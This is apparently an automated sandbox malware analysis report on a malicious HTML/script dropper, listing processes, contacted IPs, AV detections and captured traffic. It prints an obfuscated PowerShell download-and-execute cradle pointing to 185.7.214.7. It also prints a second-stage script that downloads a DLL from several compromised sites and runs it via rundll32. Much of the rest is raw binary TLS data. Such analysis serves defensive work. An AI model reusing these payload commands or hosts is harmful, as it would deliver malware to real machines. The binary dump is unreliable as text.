Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Jan. 19, 2022, 11:31 a.m. | Jan. 19, 2022, 11:35 a.m. |
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\ve.html
2336-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
2648-
cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
2132-
-
rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
2292-
rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",BykAXEZ
2384-
rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",DllRegisterServer
2688
-
-
-
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
IP Address | Status | Action |
---|---|---|
103.8.26.102 | Active | Moloch |
103.8.26.103 | Active | Moloch |
104.168.155.129 | Active | Moloch |
112.196.72.188 | Active | Moloch |
117.18.232.200 | Active | Moloch |
121.254.136.27 | Active | Moloch |
131.100.24.231 | Active | Moloch |
146.164.84.216 | Active | Moloch |
148.66.159.242 | Active | Moloch |
150.95.8.112 | Active | Moloch |
164.124.101.2 | Active | Moloch |
178.63.25.185 | Active | Moloch |
178.79.147.66 | Active | Moloch |
185.7.214.7 | Active | Moloch |
192.254.71.210 | Active | Moloch |
203.114.109.124 | Active | Moloch |
207.38.84.195 | Active | Moloch |
209.59.138.75 | Active | Moloch |
210.3.48.214 | Active | Moloch |
212.237.17.99 | Active | Moloch |
217.182.143.207 | Active | Moloch |
45.118.115.99 | Active | Moloch |
45.142.114.231 | Active | Moloch |
45.176.232.124 | Active | Moloch |
46.55.222.11 | Active | Moloch |
51.38.71.0 | Active | Moloch |
51.68.175.8 | Active | Moloch |
54.254.177.153 | Active | Moloch |
58.227.42.236 | Active | Moloch |
79.172.212.216 | Active | Moloch |
95.111.224.35 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.7.214.7/ve/ve.png | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://ippur.ufrj.br/assets/W8jp7/ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://sarvaero.com/assets/BRrGH0HSkc/ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://atplengineering.com/wp-admin/mDk/ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/ |
request | GET http://185.7.214.7/ve/ve.png |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://ippur.ufrj.br/assets/W8jp7/ |
request | GET http://sarvaero.com/assets/BRrGH0HSkc/ |
request | GET http://atplengineering.com/wp-admin/mDk/ |
request | GET http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/ |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
ip | 103.8.26.102 |
ip | 103.8.26.103 |
ip | 104.168.155.129 |
ip | 209.59.138.75 |
ip | 51.68.175.8 |
file | C:\Users\Public\Documents\ssd.dll |
file | C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X |
cmdline | "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString |
cmdline | powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X |
Cyren | VBS/Agent.AIB |
Avast | SNH:Script [Dropper] |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
McAfee-GW-Edition | BehavesLike.HTML.ExploitBlacole.lg |
Microsoft | Trojan:Script/Sabsik.FL.B!ml |
Ikarus | Trojan.Script |
AVG | SNH:Script [Dropper] |
Data received | HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 19 Jan 2022 02:33:32 GMT Content-Type: image/png Content-Length: 972 Last-Modified: Tue, 18 Jan 2022 14:05:40 GMT Connection: keep-alive ETag: "61e6c934-3cc" Accept-Ranges: bytes |
Data received | $path = "C:\Users\Public\Documents\ssd.dll"; $url1 = 'https://soomaal.softuvo.xyz/wp-includes/U7Jmw9DLhYjz/'; $url2 = 'http://ippur.ufrj.br/assets/W8jp7/'; $url3 = 'https://scoute.ai/wp-content/dIg/'; $url4 = 'https://wordpress.pixeleyenow.com/b/X1E8eB/'; $url5 = 'http://sarvaero.com/assets/BRrGH0HSkc/'; $url6 = 'http://atplengineering.com/wp-admin/mDk/'; $url7 = 'http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/'; $url8 = 'https://flatonicstudios.com/57sa4yh7/iOx1jeSrT/'; $url9 = 'http://blomjous.org/wp-admin/1W/'; $web = New-Object net.webclient; $urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9".split(","); foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{} } Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString; |
Data received | ] |
Data received | YzÄÆäþBï=6Øt<¾úéDOWNGRD gÔWh¢ûÖ&³_øW¨^2jÍøûBÀ ÿ |
Data received | ¾ |
Data received | º · 00,0 óHØ¡(@'B[¥ª¤¾0 *H÷ 0210 UUS10U Let's Encrypt10 UR30 211201144918Z 220301144917Z010Usoomaal.softuvo.xyz0"0 *H÷ 0 ÊÔöæáäa=OêÑ, UÁK´ ùÓäYâe3æèÇ`¢´YªûP6®²³¬üâ§§2E>ªzKÝtHA¬äú~|j£v¶õ)4õ²ôîàéÓ|ÛÃ`ô¹_Ý·~}`9¼âpRÙ¸ûݽ"¹Á¬ô&ȹÆþÍøèªïèôÐî_ºk`4z¬ÙË6´¥>¯Gì$~+Pá,¼NÆ}÷tÙá7î.s»'B!KJf2OìgR>ÂäÔ>õ¶?{þíéKu·øõ j«m;¹x £N0J0Uÿ 0U%0++0Uÿ0 0Ub¸í»ò©ÃJ¼%|¢®VvܨÜ0U#0.³·XVË®P @æ¯ÂÆ0U+I0G0!+0http://r3.o.lencr.org0"+0http://r3.i.lencr.org/0U0soomaal.softuvo.xyz0LU E0C0g07+ß0(0&+http://cps.letsencrypt.org0 +Öyõò ð v ߥ^«hOlî¸_N>ZêÍ¢¤j^;À D\*s }v¯ã G0E! öý t§Û[jd{.ÞY+ôÐ5ç¹ô "çx'I\x ½UÔÂ4Âaaaßå}Q(® v )y¾ð99!ðVsc¥wå¾W}` øùM]&\%]Ç }v¯Ü G0E! ¤|="Ãi¥Âx n<Y- ß*®Ftá òûtmå LôíÆÖf;WEèLâ#rÊSEîS2æÁ0 *H÷ $ÒiºÂ)YÞ°1<X`ªéQF§¹2º/od}LmÓYÌÂycàY&ÌE¹$¿¼F9^(S¯sùª89×ä.Ù"íC£0R[9=p®ã³ô4uxåÝF§ûHM6;²o×¶Vf/´0@]hØR_xWIY0³a_cç°¾¡æ°àò`·ô3HLÿí±Ê7yX¢2+T¼ ú¯Ùqé@íøö¡æxr£¯L_-Ðf¬&ÇVÉýÓvªÂª|2nþÞFÅݽtlWIlRì%FhFÐ 00þ +JϧSöÖ.%§_Z0 *H÷ 0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10 200904000000Z 250915160000Z0210 UUS10U Let's Encrypt10 UR30"0 *H÷ 0 »(Ìö ÓìUÃøñ¦zB§]&ªµ+¹ÅL±¯kùuÈ£×GU5W¨¢9õ<B©Nnõ;Ã.ÛÀ°\óY8çíÏiðZ¾À$%ú7q³ç¬áïÛä;ERE©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m¥@4k+Ó¼fëf4|úkW)ø0]ºroûÅÒX=Çç »ñ+÷ÜÁÚq]ÔFãÌ%Á¼`guf³ñ÷¢\æSÿ:¶G¥ÿê w?SùÏåõ¦p¯c¤ÿ³ÜS§þH ¡i®%u»ÌRõíQ¡Û £00Uÿ0U%0++0Uÿ0ÿ 0U.³·XVË®P @æ¯ÂÆ0U#0y´Yæ{¶åäsÈXöén02+&0$0"+0http://x1.i.lencr.org/0'U 00 http://x1.c.lencr.org/0"U 00g0 +ß0 *H÷ ÊNG>£÷ D ¼Õgx²cuM=3erT- êÃíø ¿_Ì·p ·n;ö^Þä ¦ï²ç¢µ<δí9ç|%Gæen?FôÙðÎ+îTμ'K¸Á/¢¯ÍqJ·È¸#{-ùW>Ù3 G!x 'Ã*ȹÎ\òdÈÀ¾yÀOmD^».÷áèD)ÛY íc¹!ø&W eÁ "® C¡~àà7µZ±½0¿n+*ÿ!NÃõð^¬Ã¥¸jð.¼;3¹îKÞÌüä¯?ÀUC6öhá6jÑÿ¥@§4·ÀÐc959unòºvÈé©KlÎÙ½û·hÔe³=wSøy 1u*CØUrÄ)÷Ä]NÈ®F0×ò _¡y»ç^páùÜaq%*¯ßí%PRhÜåÖµãÚ}Ðl!1®õû¹«È=áLå8ö½+½ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£¸õ/ÒRC¦o2WeM2ß8S ]~]f)ê¸ÝäµÍµVBÍÄNÆ%8DPmìÎ UþéIdÔNÊ´[Às¨«¸G d0`0H @w!7ÔéB¸îvª<d ·0 *H÷ 0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10"0 *H÷ 0 è$sô7ó+W(¾Ü·ß8n<æW x÷u¢þõjnö O(ÛÞhlD¶±cýk¿Òê1!~Ñ3<ºHõÝyß³¸ÿñ!KÁqiJffl~<p¿)"óäÀæ®âK·~ÓG|H#Sè8®O o.ÑIWt¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOÂK~Ïèÿµw.ô²{JàL%p) áS$ìÙJ?£aQÞ¬ôcqì.âo[á\4ylvï;byæÛ¤/&ÅÐáÞÙû·÷¨÷Çå6çâ7 6uûr±¼ùIØÝ´*ÖAé¬v ØßÕ½5/(lÒÁ¨ dwnG7ºÎ¬Y^hrÖÅA)>Y>Ý&õ$ɧZ£L@F¡µ§:Qn;}r§xYí>QxÐ/²>{JKsüÆêàP|Ct³ÊtçÐ0Ô[q6´ºÁ00\H·;¦}`¢£)̺½¢A¡Öñ¶ð¨|;F¨H*Üvv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpNæÙ:ÆÝ'Qnÿ¼dõ3CO £F0B0Uÿ0ÿ0Uÿ0K+?0=0;+0/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0ħ±¤{,qúÛáKuÿÄ` 0TU M0K0g0?+ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäsÈXöén0 *H÷ s lnÿRЮÝçZ/¨ã¿É PÂålB»oô´OÂDuÌëbnxÞì'º9\õ¢¡nVpS±»ä¯Ð¢Ã+ÔôÅ 53ùØa6àq´¸µªEÀò©#(çÖ¡ËgÚ C,ªÉÞõ«i]õ[X"ÊMUäpgmÂWÅF9AÏXXmþWè6ð#ªýÐã\Iµµ5Ò.¿N ïà ë;l)# `ÜEL;éûÞÜDøX®ê½EE¡]fÊþéoÈB ûéìã Þã8ú¤}±ØèI+èkO8w.ùÝç9 |
Data received | K |
Data received | G AÖ:ÜT¯Üë^x^"HNÖúQ¬OÞ?µêTDkìÌ}o {/wÒÈdv¢Q?¿ËðxdãBz Ð3O¿gèYãíÆÄ¥JîtÊ¡ðn»^z(=ø÷²·ýã'*ÓÔÚKhX5ݧbXªÙ<@Öý_"R§ç)gdÛ¨×êïb +ÖÙ=ãéIÍÇ7'Ow]lî>õ^¸Ëq9âW¥~êcø21Aö1í^ÎYFÐuÂ*uz¢ËòvçéÒþ`Åè¹)(´¨$íj ¦x[¡ØrZ¥#¨´ $îÇË =ô½áÁ]OvQ5)ùPÈ[ Ý!"ù¨RÚþt2PצQ!0]Ô¤ÌddRG4¯æ÷¹'¼ã~*ìæä |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | nm. ÅÑ}¦ÌRmã'yÛ²ÖAJÿ©pBìÚaVð»gi3ÃÁå©Rù |
Data received | HTTP/1.1 302 Moved Temporarily Server: nginx Date: Wed, 19 Jan 2022 02:33:44 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive Location: https://ippur.ufrj.br/assets/W8jp7/ <html> <head><title>302 Found</title></head> <body> <center><h1>302 Found</h1></center> <hr><center>nginx</center> </body> </html> |
Data received | |
Data received | F |
Data received | YXkçà)w¹Ã@îݧyÞÁ¡!P«ãDOWNGRD µµ"Ì-í_e¢¡Ä½nS[6¡[+£V _$ïÑÀ ÿ |
Data received | · |
Data received | ³ ° )0%0 +àß%ÜÆßíw¨)Øù·p0 *H÷ 0210 UUS10U Let's Encrypt10 UR30 211218061514Z 220318061513Z010U scoute.ai0"0 *H÷ 0 ÏâdH:ëÈð¦8åkB_·¯.³Ke)Muà/êåv$³áÉ2t'ÔÛ»<AC*ÚN¬×{û P2ÚHuÉJàm{?|Ì«Ñ;IÒ;÷¬Â¥óK8>l¥JFåãuY`ôÌÈï%×ïÉ)CﳬÅßCîÊ ¿³{sÂnÊËÙÅÞ» t÷óð¾u·òSÈïYpôK ²Ù»ÂT[n¬Ò¥_$ÅOÒ¶U8^hβaV«s°qfÓ}¼óìxr1Ú/Ã/ßkQ5~B¾ß;d¬¶DU e.ÉYk¯;Ñ{n.&lØDû £Q0M0Uÿ 0U%0++0Uÿ0 0U|S<þ0MÖÃptz*-تãú0U#0.³·XVË®P @æ¯ÂÆ0U+I0G0!+0http://r3.o.lencr.org0"+0http://r3.i.lencr.org/0#U0 scoute.ai www.scoute.ai0LU E0C0g07+ß0(0&+http://cps.letsencrypt.org0 +Öyóð î u ߥ^«hOlî¸_N>ZêÍ¢¤j^;À D\*s }Ìe F0D HÏÌâÈIî¬wÈM(RÓygÞµúð\äEü?ïe ¯«yÇy{4£ó< Cm+Tyyåò(ÛY u F¥Uëuú 0µ¢iôó},At¾ýI¸ «òüpþmG }Ìe¦ F0D nÂ$rì¦õ¿²ûÍSúùì|³ÉÊ7Älz³Ê¦2dt N2j·ÞYÿ/c ÔÒN÷¤E\ï÷ÕhµÃ&_0 *H÷ VÎ%Ïk$ÍzéKx£ãs²$¬3IÉãGD!¬K4éÃ,îÀ\°íjt£qÜlÖÖ÷U ^1|ª'uc\y¢ä¤Úrk`Ö7çùèIi¸{²Ï:¡lRs3$À®GÑÍn:Á.ÓQ Õw ,UÀ £0'Õ}Õç½q8B@xFng//ÑÀ½æÑ3{nTìIh:ÖS+©¬Ò&'ÎkaIÝæÉ`EX¯_þGê6ȸ¨®y¿1Èa`XÄ Yø°Ï =ԮΠ§ 00þ +JϧSöÖ.%§_Z0 *H÷ 0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10 200904000000Z 250915160000Z0210 UUS10U Let's Encrypt10 UR30"0 *H÷ 0 »(Ìö ÓìUÃøñ¦zB§]&ªµ+¹ÅL±¯kùuÈ£×GU5W¨¢9õ<B©Nnõ;Ã.ÛÀ°\óY8çíÏiðZ¾À$%ú7q³ç¬áïÛä;ERE©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m¥@4k+Ó¼fëf4|úkW)ø0]ºroûÅÒX=Çç »ñ+÷ÜÁÚq]ÔFãÌ%Á¼`guf³ñ÷¢\æSÿ:¶G¥ÿê w?SùÏåõ¦p¯c¤ÿ³ÜS§þH ¡i®%u»ÌRõíQ¡Û £00Uÿ0U%0++0Uÿ0ÿ 0U.³·XVË®P @æ¯ÂÆ0U#0y´Yæ{¶åäsÈXöén02+&0$0"+0http://x1.i.lencr.org/0'U 00 http://x1.c.lencr.org/0"U 00g0 +ß0 *H÷ ÊNG>£÷ D ¼Õgx²cuM=3erT- êÃíø ¿_Ì·p ·n;ö^Þä ¦ï²ç¢µ<δí9ç|%Gæen?FôÙðÎ+îTμ'K¸Á/¢¯ÍqJ·È¸#{-ùW>Ù3 G!x 'Ã*ȹÎ\òdÈÀ¾yÀOmD^».÷áèD)ÛY íc¹!ø&W eÁ "® C¡~àà7µZ±½0¿n+*ÿ!NÃõð^¬Ã¥¸jð.¼;3¹îKÞÌüä¯?ÀUC6öhá6jÑÿ¥@§4·ÀÐc959unòºvÈé©KlÎÙ½û·hÔe³=wSøy 1u*CØUrÄ)÷Ä]NÈ®F0×ò _¡y»ç^páùÜaq%*¯ßí%PRhÜåÖµãÚ}Ðl!1®õû¹«È=áLå8ö½+½ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£¸õ/ÒRC¦o2WeM2ß8S ]~]f)ê¸ÝäµÍµVBÍÄNÆ%8DPmìÎ UþéIdÔNÊ´[Às¨«¸G d0`0H @w!7ÔéB¸îvª<d ·0 *H÷ 0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10"0 *H÷ 0 è$sô7ó+W(¾Ü·ß8n<æW x÷u¢þõjnö O(ÛÞhlD¶±cýk¿Òê1!~Ñ3<ºHõÝyß³¸ÿñ!KÁqiJffl~<p¿)"óäÀæ®âK·~ÓG|H#Sè8®O o.ÑIWt¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOÂK~Ïèÿµw.ô²{JàL%p) áS$ìÙJ?£aQÞ¬ôcqì.âo[á\4ylvï;byæÛ¤/&ÅÐáÞÙû·÷¨÷Çå6çâ7 6uûr±¼ùIØÝ´*ÖAé¬v ØßÕ½5/(lÒÁ¨ dwnG7ºÎ¬Y^hrÖÅA)>Y>Ý&õ$ɧZ£L@F¡µ§:Qn;}r§xYí>QxÐ/²>{JKsüÆêàP|Ct³ÊtçÐ0Ô[q6´ºÁ00\H·;¦}`¢£)̺½¢A¡Öñ¶ð¨|;F¨H*Üvv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpNæÙ:ÆÝ'Qnÿ¼dõ3CO £F0B0Uÿ0ÿ0Uÿ0K+?0=0;+0/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0ħ±¤{,qúÛáKuÿÄ` 0TU M0K0g0?+ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäsÈXöén0 *H÷ s lnÿRЮÝçZ/¨ã¿É PÂålB»oô´OÂDuÌëbnxÞì'º9\õ¢¡nVpS±»ä¯Ð¢Ã+ÔôÅ 53ùØa6àq´¸µªEÀò©#(çÖ¡ËgÚ C,ªÉÞõ«i]õ[X"ÊMUäpgmÂWÅF9AÏXXmþWè6ð#ªýÐã\Iµµ5Ò.¿N ïà ë;l)# `ÜEL;éûÞÜDøX®ê½EE¡]fÊþéoÈB ûéìã Þã8ú¤}±ØèI+èkO8w.ùÝç9 |
Data received | G A¡6(X ggFiKÞ®ÛmoM£<Áy7ôÄ ±gðWÎÃxø1s§Þ=ò £º ¤ÜèG i¡õ°W,çÖÈÆÁ7_#|æ1Ri.5ÅOäÙñݺÛ.³SFCkáøÉ&fR;FÕ"ç0j&â¤&µúâéÙöÚ{Aæ> ¯Sæ¹ik{óÝ=q.ê÷£½<6drV©¢6@Wâ%eËÑIbíÒ`bõ^UN¼? ¾á\ùÚH¡M-ºuElÃêî&yëVH;=øØì,jÈ(vÏn©ûÍï7ÅÛ-'ûh»$_è8rÛø%®b¶Sè$Z°Ï :xÊ:µ@Q"ÌÃåØs)"q*gÖq |
Data received | ¡¸ZÐÙϰ»T<¼óªU¹»lÌeC$.p¬ÚàqwÑ9ºð¹k"vT |
Data received | U |
Data received | QÍç°4ír@*X17ö@ t8ùñ-DOWNGRD yûeûl([.jª×yื×÷ÜþS?6| / ÿ |
Data received | É |
Data received | Å Â ;070 Ú°¶²F´ÊP³r 0 *H÷ 0210 UUS10U Let's Encrypt10 UR30 211209094957Z 220309094956Z0$1"0 Uwordpress.pixeleyenow.com0"0 *H÷ 0 ËoÝìС×ÄÞìÝ}ɰõä<(Ä©ì Th û4wóuiZÅèÓy4YêL³ÓiS#íµÙ'ø>Ýcô®vX¯ÑÂN³»kÚÜ×ê6]¦cË^kBV߯éÕVT ×nú÷z¾gܦxJßNÃvØY/ZCñ¨ShÛm¦sýÎ>,*L?sÎN¤2(« 8"8]!G16q]'Ñ9¸Ê1?Ù¢ñ=³SAP2m¸¥ð¿ 4¾á§¤Ôx(ÐÍ >#]ì|Þ7¡9ÉÒÍ?à.ÉiÝS¯ªÔR7 £S0O0Uÿ 0U%0++0Uÿ0 0U¥Fu èùðîIá"\n»DÙ0U#0.³·XVË®P @æ¯ÂÆ0U+I0G0!+0http://r3.o.lencr.org0"+0http://r3.i.lencr.org/0$U0wordpress.pixeleyenow.com0LU E0C0g07+ß0(0&+http://cps.letsencrypt.org0 +Öyôñ ï v )y¾ð99!ðVsc¥wå¾W}` øùM]&\%]Ç }Ðgñ G0E! ð³w7·Ô-xM6Þ%§%'éÖ _ZxÆÂ¿÷;¦¡_Êo'WXÛlz&4O^ ÇQ u ߥ^«hOlî¸_N>ZêÍ¢¤j^;À D\*s }Ðiö F0D 8Üs¤ìW'S3#ïT5rWrDù"{-ê¹q/ 6Ll;îhË×3èÌÎjÐJ`?#ú(ôb ¾*0 *H÷ ©åªÙu/X¨`ø¤ÖØ'ïÉ¢MêÜXh»Þg%~áLA&ig²éA:ÿsHðî@ÂìZV¸±²ºÕL)f¥)f4Ê·4Ê¢¹ûàþxãiñôÂalÆ/Sä&²Qӻľ¹çgàÀÚ5æòAHqórw=D ¥Ìêa3yäÝN^¯#B½¡ö÷ê0<Î5^t6POPS¦BEzÕíyÍ(_iÞÒuÆtxÒ¯_ Å^M§è0¬ ¹óêBóÄÝ>bú¦ó9ãa걡0¯6¡[< 00þ +JϧSöÖ.%§_Z0 *H÷ 0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10 200904000000Z 250915160000Z0210 UUS10U Let's Encrypt10 UR30"0 *H÷ 0 »(Ìö ÓìUÃøñ¦zB§]&ªµ+¹ÅL±¯kùuÈ£×GU5W¨¢9õ<B©Nnõ;Ã.ÛÀ°\óY8çíÏiðZ¾À$%ú7q³ç¬áïÛä;ERE©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m¥@4k+Ó¼fëf4|úkW)ø0]ºroûÅÒX=Çç »ñ+÷ÜÁÚq]ÔFãÌ%Á¼`guf³ñ÷¢\æSÿ:¶G¥ÿê w?SùÏåõ¦p¯c¤ÿ³ÜS§þH ¡i®%u»ÌRõíQ¡Û £00Uÿ0U%0++0Uÿ0ÿ 0U.³·XVË®P @æ¯ÂÆ0U#0y´Yæ{¶åäsÈXöén02+&0$0"+0http://x1.i.lencr.org/0'U 00 http://x1.c.lencr.org/0"U 00g0 +ß0 *H÷ ÊNG>£÷ D ¼Õgx²cuM=3erT- êÃíø ¿_Ì·p ·n;ö^Þä ¦ï²ç¢µ<δí9ç|%Gæen?FôÙðÎ+îTμ'K¸Á/¢¯ÍqJ·È¸#{-ùW>Ù3 G!x 'Ã*ȹÎ\òdÈÀ¾yÀOmD^».÷áèD)ÛY íc¹!ø&W eÁ "® C¡~àà7µZ±½0¿n+*ÿ!NÃõð^¬Ã¥¸jð.¼;3¹îKÞÌüä¯?ÀUC6öhá6jÑÿ¥@§4·ÀÐc959unòºvÈé©KlÎÙ½û·hÔe³=wSøy 1u*CØUrÄ)÷Ä]NÈ®F0×ò _¡y»ç^páùÜaq%*¯ßí%PRhÜåÖµãÚ}Ðl!1®õû¹«È=áLå8ö½+½ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£¸õ/ÒRC¦o2WeM2ß8S ]~]f)ê¸ÝäµÍµVBÍÄNÆ%8DPmìÎ UþéIdÔNÊ´[Às¨«¸G d0`0H @w!7ÔéB¸îvª<d ·0 *H÷ 0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10"0 *H÷ 0 è$sô7ó+W(¾Ü·ß8n<æW x÷u¢þõjnö O(ÛÞhlD¶±cýk¿Òê1!~Ñ3<ºHõÝyß³¸ÿñ!KÁqiJffl~<p¿)"óäÀæ®âK·~ÓG|H#Sè8®O o.ÑIWt¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOÂK~Ïèÿµw.ô²{JàL%p) áS$ìÙJ?£aQÞ¬ôcqì.âo[á\4ylvï;byæÛ¤/&ÅÐáÞÙû·÷¨÷Çå6çâ7 6uûr±¼ùIØÝ´*ÖAé¬v ØßÕ½5/(lÒÁ¨ dwnG7ºÎ¬Y^hrÖÅA)>Y>Ý&õ$ɧZ£L@F¡µ§:Qn;}r§xYí>QxÐ/²>{JKsüÆêàP|Ct³ÊtçÐ0Ô[q6´ºÁ00\H·;¦}`¢£)̺½¢A¡Öñ¶ð¨|;F¨H*Üvv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpNæÙ:ÆÝ'Qnÿ¼dõ3CO £F0B0Uÿ0ÿ0Uÿ0K+?0=0;+0/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0ħ±¤{,qúÛáKuÿÄ` 0TU M0K0g0?+ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäsÈXöén0 *H÷ s lnÿRЮÝçZ/¨ã¿É PÂålB»oô´OÂDuÌëbnxÞì'º9\õ¢¡nVpS±»ä¯Ð¢Ã+ÔôÅ 53ùØa6àq´¸µªEÀò©#(çÖ¡ËgÚ C,ªÉÞõ«i]õ[X"ÊMUäpgmÂWÅF9AÏXXmþWè6ð#ªýÐã\Iµµ5Ò.¿N ïà ë;l)# `ÜEL;éûÞÜDøX®ê½EE¡]fÊþéoÈB ûéìã Þã8ú¤}±ØèI+èkO8w.ùÝç9 |
Data received | ~\×´¸ña³e1v.ÚøÅ1ÒÝ8||°s&àÄ¡ t0JÁ |
